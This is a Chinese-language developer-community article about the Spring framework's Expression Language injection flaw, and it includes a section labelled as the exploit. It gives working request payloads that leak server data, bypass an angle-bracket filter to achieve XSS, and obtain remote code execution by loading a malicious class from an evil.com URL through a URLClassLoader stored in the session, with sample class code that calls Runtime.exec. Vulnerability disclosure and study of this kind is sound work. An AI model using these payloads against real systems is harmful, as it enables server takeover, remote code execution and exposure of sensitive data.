AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Spring爆远程代码执行漏洞(含EXP)

2013-07-05 1140
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。

上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。该漏洞被命名为“remote code with Expression Language injection”。他们发现,通过发送特定的Spring标签,可以导致服务器上的敏感数据暴露、执行任意代码等。(PS:该漏洞早在2011年就发现了,只是未对外公布。)

威廉姆斯称,Spring未来版本中将有可能默认不启用表达式语言功能,但是,目前存在的这个漏洞,如果被攻击者利用,可能会对应用程序产生大的威胁。这是非常危险的,攻击者可以完全接管一个Web应用程序,并在服务器上运行他们的代码。他还指出,该漏洞跟最近披露的浏览器Java漏洞无任何联系。

据提供开源组件的中央仓库Sonatype数据显示,目前已有超过2.2万个机构下载了超过130万次存在安全漏洞的Spring框架。

下面节选了部分在Glassfish+EL 2.2远程执行代码的列子,完整Paper查看地址

0×01:
发起请求如下:

http://vulnerable.com/foo?message=${applicationScope}

页面如果包含

<spring:message text="" code="${param['message']}"></spring:message>

会导致输出服务器的一些敏感信息,包括classpath和本地工作目录等。

0×02:
当应用程序做了过滤器,会对所有’<’和’>’进行过滤。利用Expression Language特性,可尝试如下绕过过滤:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPPP

发起该请求之后,当String.replaceAll方法被调用的时候。该语句会返回一段文本,并插入spring:message tag,返回的错误代码中会显示QQQQQQ。

最终成功执行XSS,绕过过滤器的语句如下:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”<”).replaceAll(“Q”,”>”)}&foo=PscriptQalert(1);P/scriptQ

根据老外放出的Paper,我们可以看到能成功执行任意代码。但是到目前为止,还没有任何快速修复补丁放出。因此,使用Spring框架的应用程序可能存在安全隐患,建议开发者关闭表达式语言功能。

补充:

0×03:远程执行EXP

1.建立一个ArrayList以构造一个URLClassLoader,并且需要在session中存着,可以在后面利用。

${pageContext.request.getSession().setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}

2.通过URL对象载入远程执行的代码类

${pageContext.request.getSession().getAttribute("arr").add(pageContext.getServletContext().getResource("/").toURI().create("http://evil.com/path/to/where/malicious/classfile/is/located/").toURL())}

远程执行的代码类(运行一个计算器)

public class Malicious {
       public Malicious() { 
	   try {
                     java.lang.Runtime.getRuntime().exec("open -a Calculator"); //Mac
                     java.lang.Runtime.getRuntime().exec("calc.exe"); //Win
              } catch (Exception e) {    
              }
       }
}

3.执行代码,打开一个计算器(运行结果截图见上文)

${pageContext.getClass().getClassLoader().getParent().newInstance(pageContext.request.getSession().getAttribute("arr").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadClass("Malicious").newInstance()}

关于Spring

Spring是一个开源框架,Sping 是于2003 年兴起的一个轻量级的Java 开发框架,由Rod Johnson 在其著作Expert One-On-One J2EE Development and Design中阐述的部分理念和原型衍生而来。它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。


文章标签:
Java
Spring
安全
关键词:
Spring远程代码执行
Spring漏洞
Spring远程代码执行漏洞
Spring代码执行
Spring代码执行漏洞
cnbird
目录
相关文章
Tom弹架构
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
Tom弹架构
118 1
香甜可口草莓蛋糕
|
3月前
|
安全 Java 网络安全
Spring Framework JDK >= 9 远程代码执行(CVE-2022-22965)
Spring Framework JDK >= 9 远程代码执行(CVE-2022-22965)
香甜可口草莓蛋糕
170 0
李火火
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
李火火
428 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
ckcsec
|
安全 Java API
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
ckcsec
328 0
Spring_Cloud_Gateway远程代码执行(CVE-2022-22947)
ckcsec
|
安全 Java Serverless
Spring Cloud Function SPEL 远程命令执行漏洞
Spring Cloud Function SPEL 远程命令执行漏洞
ckcsec
459 0
码农飞哥
|
SQL 安全 前端开发
如何预防SQL注入,XSS漏洞(spring,java)
SQL注入是由于程序员对用户输入的参数没有做好校验,让不法分子钻了SQL的空子,
码农飞哥
350 0
游客du62snpusmjeg
|
安全 IDE Java
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
游客du62snpusmjeg
435 0
Spring 新版本修复远程命令执行漏洞(CVE-2022-22965),墨菲安全开源工具可应急排查
游客du62snpusmjeg
|
监控 安全 IDE
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
游客du62snpusmjeg
455 0
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析
杀死一只知更鸟debug
|
2月前
|
SQL 监控 druid
springboot-druid数据源的配置方式及配置后台监控-自定义和导入stater(推荐-简单方便使用)两种方式配置druid数据源
这篇文章介绍了如何在Spring Boot项目中配置和监控Druid数据源,包括自定义配置和使用Spring Boot Starter两种方法。
杀死一只知更鸟debug
591 1
最好zzz
|
1月前
|
人工智能 自然语言处理 前端开发
SpringBoot + 通义千问 + 自定义React组件:支持EventStream数据解析的技术实践
【10月更文挑战第7天】在现代Web开发中,集成多种技术栈以实现复杂的功能需求已成为常态。本文将详细介绍如何使用SpringBoot作为后端框架,结合阿里巴巴的通义千问(一个强大的自然语言处理服务),并通过自定义React组件来支持服务器发送事件(SSE, Server-Sent Events)的EventStream数据解析。这一组合不仅能够实现高效的实时通信,还能利用AI技术提升用户体验。
最好zzz
176 2

热门文章

最新文章

  • 1
    Spring-boot+Dubbo应用启停源码分析
  • 2
    SpringMvc+Spring+MyBatis 基于注解整合
  • 3
    Spring Boot整合MyBatis操作mysql数据库实战(附源码 超详细)
  • 4
    Spring装配Bean---使用xml配置
  • 5
    Ehcache 整合Spring 使用页面、对象缓存
  • 6
    在Spring中使用JDK定时器实现调度任务
  • 7
    面向切面的Spring
  • 8
    Spring框架下的单元测试方法
  • 9
    阿里开发者学院:Java Spring Boot 2.5.x开发实战课程
  • 10
    Spring(二)之入门示例
  • 1
    【MongoDB 专栏】MongoDB 与 Spring Boot 的集成实践
    240
  • 2
    深入探索Spring Boot Web应用源码及实战应用
    95
  • 3
    ruoyi-nbcio从spring2.7.18升级springboot到3.1.7,java从java8升级到17(二)
    317
  • 4
    springboot全局自定义异常
    39
  • 5
    RabbitMQ的springboot项目集成使用-01
    143
  • 6
    什么是Spring Boot 自动配置?
    49
  • 7
    Spring cloud原理详解
    69
  • 8
    Springboot 集成Rabbitmq之延时队列
    186
  • 9
    Spring Boot 单元测试 0基础教程
    45
  • 10
    Spring框架与Spring Boot的区别和联系
    626

    • 相关课程

    更多
  • 全面讲解Spring Cloud Alibaba技术栈(知识精讲+项目实战)第二阶段
  • 精通Spring Cloud Alibaba
  • 微服务框架 Spring Cloud 快速入门
  • Java Web开发系列课程 - Spring框架入门
  • Spring Boot 2.5.x开发实战
  • Spring Cloud微服务架构设计与开发实战

    • 相关电子书

    更多
  • 云栖社区特邀专家徐雷Java Spring Boot开发实战系列课程(第20讲):经典面试题与阿里等名企内部招聘求职面试技巧
  • 微服务架构模式与原理Spring Cloud开发实战
  • 阿里特邀专家徐雷Java Spring Boot开发实战系列课程(第18讲):制作Java Docker镜像与推送到DockerHub和阿里云Docker仓库

    • 相关实验场景

    更多
  • 1分钟代码漏洞自动检测
    • 下一篇
    无影云桌面